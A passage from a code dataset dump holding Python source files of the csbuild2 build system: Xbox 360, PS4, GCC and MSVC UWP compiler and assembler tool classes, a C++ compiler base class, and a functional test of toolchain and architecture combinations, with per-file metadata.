classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._xbox360SdkPath:\n\t\t\tself._xbox360SdkPath = os.getenv(\"XEDK\", None)\n\n\t\tassert self._xbox360SdkPath, \"No Xbox 360 SDK path has been set\"\n\t\tassert os.access(self._xbox360SdkPath, os.F_OK), \"Xbox 360 SDK path does not exist: {}\".format(self._xbox360SdkPath)\n\n\t\tself._xbox360SdkPath = os.path.abspath(self._xbox360SdkPath)\n\n\t\tself._xbox360BinPath = os.path.join(self._xbox360SdkPath, \"bin\", \"win32\")\n\t\tself._xbox360LibPath = os.path.join(self._xbox360SdkPath, \"lib\", \"xbox\")\n\t\tself._xbox360IncludePath = os.path.join(self._xbox360SdkPath, \"include\", \"xbox\")\n\n\nclass Xbox360ImageXexTool(Xbox360BaseTool):\n\t\"\"\"\n\tTool that converts a compiled executable for Xbox 360 into a XEX image capable of running on hardware.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"xcpu\" }\n\tinputFiles = { \".exe\", \".dll\" }\n\toutputFiles = { \".xex\" }\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tXbox360BaseTool.__init__(self, projectSettings)\n\n\t\tself._exePath = None\n\n\t\tself._xexConfigPath = projectSettings.get(\"xbox360XexConfigPath\", None)\n\t\tself._xexImageFlags = projectSettings.get(\"xbox360imageFlags\", 
[])\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetXbox360ImageConfigFile(path):\n\t\t\"\"\"\n\t\tSet the path to the Xbox 360 XEX config file.\n\t\tThe properties in this file will override any flags that are set manually\n\n\t\t:param path: Path to the XEX config file.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"xbox360XexConfigPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetXbox360ImageFlags(*flags):\n\t\t\"\"\"\n\t\tAdd flags to pass to the XEX image conversion program.\n\n\t\t:param flags: List of XEX image flags.\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"xbox360imageFlags\", flags)\n\n\n\t################################################################################\n\t### Internal methods\n\t################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tinputFileExtSplit = os.path.splitext(os.path.basename(inputFile.filename))\n\t\toutputFilePath = os.path.join(\n\t\t\tproject.outputDir,\n\t\t\t\"{}.xex\".format(inputFileExtSplit[0])\n\t\t)\n\t\treturn tuple({ outputFilePath })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmdExe = self._getExeName()\n\t\tcmd = [cmdExe] \\\n\t\t\t+ self._getDefaultArgs() \\\n\t\t\t+ self._getInputArgs(inputFile) \\\n\t\t\t+ self._getOutputArgs(project, inputFile) \\\n\t\t\t+ self._getTitleConfigArgs() \\\n\t\t\t+ self._getMiscArgs()\n\n\t\treturn cmd\n\n\tdef _getExeName(self):\n\t\treturn os.path.join(self._xbox360BinPath, \"imagexex.exe\")\n\n\tdef _getDefaultArgs(self):\n\t\treturn [\"/nologo\"]\n\n\tdef _getInputArgs(self, inputFile):\n\t\targ = \"/IN:{}\".format(inputFile.filename)\n\t\treturn [arg]\n\n\tdef _getOutputArgs(self, project, inputFile):\n\t\targ = \"/OUT:{}\".format(self._getOutputFiles(project, inputFile)[0])\n\t\treturn [arg]\n\n\tdef _getTitleConfigArgs(self):\n\t\targs = []\n\n\t\tif self._xexConfigPath:\n\t\t\targs.append(\"/CONFIG:{}\".format(self._xexConfigPath))\n\n\t\treturn args\n\n\tdef _getMiscArgs(self):\n\t\treturn self._xexImageFlags\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tXbox360BaseTool.SetupForProject(self, project)\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. 
If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Building XEX image for {} ({}-{}-{})...\",\n\t\t\tos.path.basename(inputFile.filename),\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n" }, { "alpha_fraction": 0.6753016114234924, "alphanum_fraction": 0.6816891431808472, "avg_line_length": 35.59740447998047, "blob_id": "0cdfd7904f2d0eace72b7ea8a9675dca7e74e8da", "content_id": "98ec075858d9aaa1c6cfd3562dbb49d7261ced6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2818, "license_type": "no_license", "max_line_length": 117, "num_lines": 77, "path": "/csbuild/tools/cpp_compilers/ps4_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps4_cpp_compiler\n\t:synopsis: Implementation of the PS4 C/C++ compiler tool.\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .gcc_cpp_compiler import GccCppCompiler\n\nfrom ..common.sony_tool_base import Ps4BaseTool\n\nclass Ps4CppCompiler(Ps4BaseTool, GccCppCompiler):\n\t\"\"\"\n\tPS4 C/C++ compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x64\" }\n\toutputFiles = { \".o\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs4BaseTool.__init__(self, projectSettings)\n\t\tGccCppCompiler.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getComplierName(self, project, isCpp):\n\t\tbinPath = os.path.join(self._ps4SdkPath, \"host_tools\", \"bin\")\n\t\texeName = \"orbis-clang++.exe\" if isCpp else \"orbis-clang.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\"-fPIC\"] if project.projectType == csbuild.ProjectType.SharedLibrary else []\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = GccCppCompiler._getIncludeDirectoryArgs(self)\n\n\t\t# Add the PS4 system include directories.\n\t\targs.extend([\n\t\t\t\"-I{}\".format(os.path.join(self._ps4SdkPath, \"target\", \"include\")),\n\t\t\t\"-I{}\".format(os.path.join(self._ps4SdkPath, \"target\", \"include_common\")),\n\t\t])\n\n\t\treturn args\n\n\tdef SetupForProject(self, project):\n\t\tPs4BaseTool.SetupForProject(self, project)\n\t\tGccCppCompiler.SetupForProject(self, project)\n" }, { "alpha_fraction": 0.6230876445770264, "alphanum_fraction": 0.6286509037017822, "avg_line_length": 33.90291213989258, "blob_id": "d62ceab45fce124e0d02ab1e1122952e5f8b23da", "content_id": "4f6bb2cf4574481dfed10dca1922f02b8de16d9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3595, "license_type": "no_license", "max_line_length": 117, "num_lines": 103, "path": "/csbuild/tools/assemblers/gcc_assembler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: gcc_assembler\n\t:synopsis: GCC assembler tool\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .assembler_base import AssemblerBase\n\nclass GccAssembler(AssemblerBase):\n\t\"\"\"\n\tGCC assembler implementation\n\t\"\"\"\n\tsupportedArchitectures = {\"x86\", \"x64\", \"arm\", \"arm64\"}\n\tinputFiles={\".s\", \".S\"}\n\toutputFiles = {\".o\"}\n\n\tdef __init__(self, projectSettings):\n\t\tAssemblerBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmd = [self._getComplierName()] \\\n\t\t\t+ self._getInputFileArgs(inputFile) \\\n\t\t\t+ self._getDefaultArgs(project) \\\n\t\t\t+ self._getCustomArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getArchitectureArgs(project)\n\n\t\treturn [arg for arg in cmd if arg]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self):\n\t\treturn \"gcc\"\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\"--pass-exit-codes\"]\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"-fPIC\")\n\t\treturn args\n\n\tdef _getCustomArgs(self):\n\t\treturn self._asmFlags\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", \"{}\".format(inputFile.filename)]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", \"{}\".format(outputFiles[0])]\n\n\tdef _getPreprocessorArgs(self):\n\t\treturn [\"-D{}\".format(d) for d in self._defines]\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\treturn [\"-I{}\".format(d) for d in self._includeDirectories]\n\n\tdef _getArchitectureArgs(self, project):\n\t\targs = {\n\t\t\t\"x86\": [\"-m32\"],\n\t\t\t\"x64\": [\"-m64\"],\n\t\t}.get(project.architectureName, [])\n\t\treturn args\n" }, { "alpha_fraction": 0.668639063835144, "alphanum_fraction": 0.6706114411354065, "avg_line_length": 37.26415252685547, "blob_id": "63a86116f5ae13e576d92472ed21c1899ca37e79", "content_id": "2ec5c29be06c5909a26cef1648edcb0d7ef191cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2028, "license_type": "no_license", "max_line_length": 117, "num_lines": 53, "path": "/csbuild/tools/assemblers/msvc_uwp_assembler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_uwp_assembler\n\t:synopsis: MSVC assembler tool to build apps for the Universal Windows Platform.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom .msvc_assembler import MsvcAssembler\n\ndef _ignore(_):\n\tpass\n\nclass MsvcUwpAssembler(MsvcAssembler):\n\t\"\"\"\n\tMSVC assembler tool to build apps for the Universal Windows Platform.\n\t\"\"\"\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcAssembler.__init__(self, projectSettings)\n\n\t\t# Enable UWP builds so the base tool sets up the toolchain backend properly.\n\t\tself._enableUwp = True\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getUwpArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n" }, { "alpha_fraction": 0.6859813332557678, "alphanum_fraction": 0.6885981559753418, "avg_line_length": 50.44230651855469, "blob_id": "672d2167bf318871427ba88cd27aec440a681ff3", "content_id": "09b3c2d335d9c4fa556a8810c722ea963b9ebd34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5350, "license_type": "no_license", "max_line_length": 136, "num_lines": 104, "path": "/functional_tests/toolchain_architecture_combinations_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test to make sure that invalid toolchain/architecture/platform/target combinations all function as expected\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild import log\nimport platform\nimport os\n\nclass ToolchainArchitectureTest(FunctionalTest):\n\t\"\"\"Test combinations of toolchains, architectures, platforms, and targets\"\"\"\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tFunctionalTest.setUp(self, cleanAtEnd=False)\n\n\tdef tearDown(self):\n\t\tif os.path.exists(\"out\"):\n\t\t\tfor filename in os.listdir(\"out\"):\n\t\t\t\tos.remove(os.path.join(\"out\", filename))\n\t\t\tos.rmdir(\"out\")\n\t\tFunctionalTest.tearDown(self)\n\n\tdef testValidCombinations(self):\n\t\t\"\"\"Test various combinations, they should all succeed\"\"\"\n\t\tfor toolchain in [\"A\", \"B\", \"C\", \"D\", platform.system()]:\n\t\t\tfor target in [\"A\", \"B\", \"special\"]:\n\t\t\t\tfor architecture in [\"A\", \"B\", \"C\", \"D\", \"E\"]:\n\t\t\t\t\tif architecture == \"E\" and toolchain != \"D\":\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tself.assertMakeSucceeds(\"--toolchain\", toolchain, \"--target\", target, \"--architecture\", architecture, \"-v\")\n\t\t\t\t\tlog.Test(\"Created {}\", os.listdir(\"out\"))\n\n\t\t\t\t\tif target != \"special\":\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/foo.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/foo.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tif architecture in [\"A\", \"B\", \"C\"]:\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/arch.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/arch.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/arch2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/arch2.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tif target == \"A\":\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/target.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/target.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/target2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/target2.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/unspecial.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/unspecial.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tif toolchain in [\"B\", \"C\", \"D\"]:\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/toolchain.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/toolchain.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/toolchain2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/toolchain2.{}.{}.{}\".format(architecture, target, 
toolchain))\n\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/{}.{}.{}.{}\".format(platform.system(), architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/{}.{}.{}.{}\".format(platform.system(), architecture, target, toolchain))\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/{}2.{}.{}.{}\".format(platform.system(), architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/{}2.{}.{}.{}\".format(platform.system(), architecture, target, toolchain))\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/special.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/special.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/special2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/special2.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\tself.assertFalse(os.listdir(\"out\"), \"Out directory still contains {}\".format(os.listdir(\"out\")))\n\n\t\t\t\t\tself.assertMakeSucceeds(\"--toolchain\", toolchain, \"--target\", target, \"--architecture\", architecture, \"--clean\")\n\n\tdef testInvalidCombination(self):\n\t\t\"\"\"Test an invalid combination to make sure csbuild doesn't try to build when there are no valid projects for the given combination\"\"\"\n\t\tself.assertMakeFails(\n\t\t\t\"No projects were found supporting the requested architecture, toolchain, target, and platform combination\",\n\t\t\t\"--toolchain\", \"A\", \"--target\", \"B\", \"--architecture\", \"E\"\n\t\t)\n" }, { "alpha_fraction": 0.6540605425834656, "alphanum_fraction": 0.6554166078567505, "avg_line_length": 32.35175704956055, "blob_id": "d9d65389dc2f848d67d1755dae1c0703a707cf8e", "content_id": "1d6b045e11f7d5bfe94248dcc89c1f46a888b2a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6637, "license_type": "no_license", "max_line_length": 153, "num_lines": 199, "path": "/csbuild/tools/cpp_compilers/cpp_compiler_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: cpp_compiler_base\n\t:synopsis: Basic class for C++ compilers\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.tool_traits import \\\n\tHasDebugLevel, \\\n\tHasDebugRuntime, \\\n\tHasDefines, \\\n\tHasIncludeDirectories, \\\n\tHasOptimizationLevel, \\\n\tHasStaticRuntime, \\\n\tHasCcLanguageStandard, \\\n\tHasCxxLanguageStandard \\\n\nfrom ... import commands, log\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass CppCompilerBase(\n\tHasDebugLevel,\n\tHasDebugRuntime,\n\tHasDefines,\n\tHasIncludeDirectories,\n\tHasOptimizationLevel,\n\tHasStaticRuntime,\n\tHasCcLanguageStandard,\n\tHasCxxLanguageStandard\n):\n\t\"\"\"\n\tBase class for C++ compilers\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputFiles={\".cpp\", \".c\", \".cc\", \".cxx\"}\n\tdependencies={\".gch\", \".pch\"}\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._globalFlags = projectSettings.get(\"globalFlags\", [])\n\t\tself._cFlags = projectSettings.get(\"cFlags\", [])\n\t\tself._cxxFlags = projectSettings.get(\"cxxFlags\", [])\n\n\t\tHasDebugLevel.__init__(self, projectSettings)\n\t\tHasDebugRuntime.__init__(self, projectSettings)\n\t\tHasDefines.__init__(self, projectSettings)\n\t\tHasIncludeDirectories.__init__(self, projectSettings)\n\t\tHasOptimizationLevel.__init__(self, projectSettings)\n\t\tHasStaticRuntime.__init__(self, projectSettings)\n\t\tHasCcLanguageStandard.__init__(self, projectSettings)\n\t\tHasCxxLanguageStandard.__init__(self, projectSettings)\n\n\t\tself._projectTypeDefines = {\n\t\t\tcsbuild.ProjectType.Application: \"CSB_APPLICATION=1\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \"CSB_SHARED_LIBRARY=1\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \"CSB_STATIC_LIBRARY=1\",\n\t\t}\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddCompilerFlags(*flags):\n\t\t\"\"\"\n\t\tAdd compiler flags that are applid to both C and C++ files.\n\n\t\t:param flags: List of flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"globalFlags\", flags)\n\n\t@staticmethod\n\tdef AddCompilerCcFlags(*flags):\n\t\t\"\"\"\n\t\tAdd compiler C flags.\n\n\t\t:param flags: List of C flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"cFlags\", flags)\n\n\t@staticmethod\n\tdef AddCompilerCxxFlags(*flags):\n\t\t\"\"\"\n\t\tAdd compiler C++ flags.\n\n\t\t:param flags: List of C++ flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"cxxFlags\", flags)\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by 
subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project, inputFile):\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\treturn []\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tHasDebugLevel.SetupForProject(self, project)\n\t\tHasDebugRuntime.SetupForProject(self, project)\n\t\tHasDefines.SetupForProject(self, project)\n\t\tHasIncludeDirectories.SetupForProject(self, project)\n\t\tHasOptimizationLevel.SetupForProject(self, project)\n\t\tHasStaticRuntime.SetupForProject(self, project)\n\t\tHasCcLanguageStandard.SetupForProject(self, project)\n\t\tHasCxxLanguageStandard.SetupForProject(self, project)\n\n\t\tif project.projectType in self._projectTypeDefines:\n\t\t\tself._defines.add(self._projectTypeDefines[project.projectType])\n\n\t\tself._defines.add(\"CSB_TARGET_{}=1\".format(project.targetName.upper()))\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Compiling {} ({}-{}-{})...\",\n\t\t\tinputFile,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\t_, extension = os.path.splitext(inputFile.filename)\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile, extension in {\".cpp\", \".cc\", \".cxx\", \".mm\"}), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n" }, { "alpha_fraction": 0.7105719447135925, "alphanum_fraction": 0.7157712578773499, "avg_line_length": 20.637500762939453, "blob_id": "5cfee9726e10ba94ac94ae63186da19fc3de90df", "content_id": "3c78332121ae71ddc7908b1e76b801d7803751d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3462, "license_type": 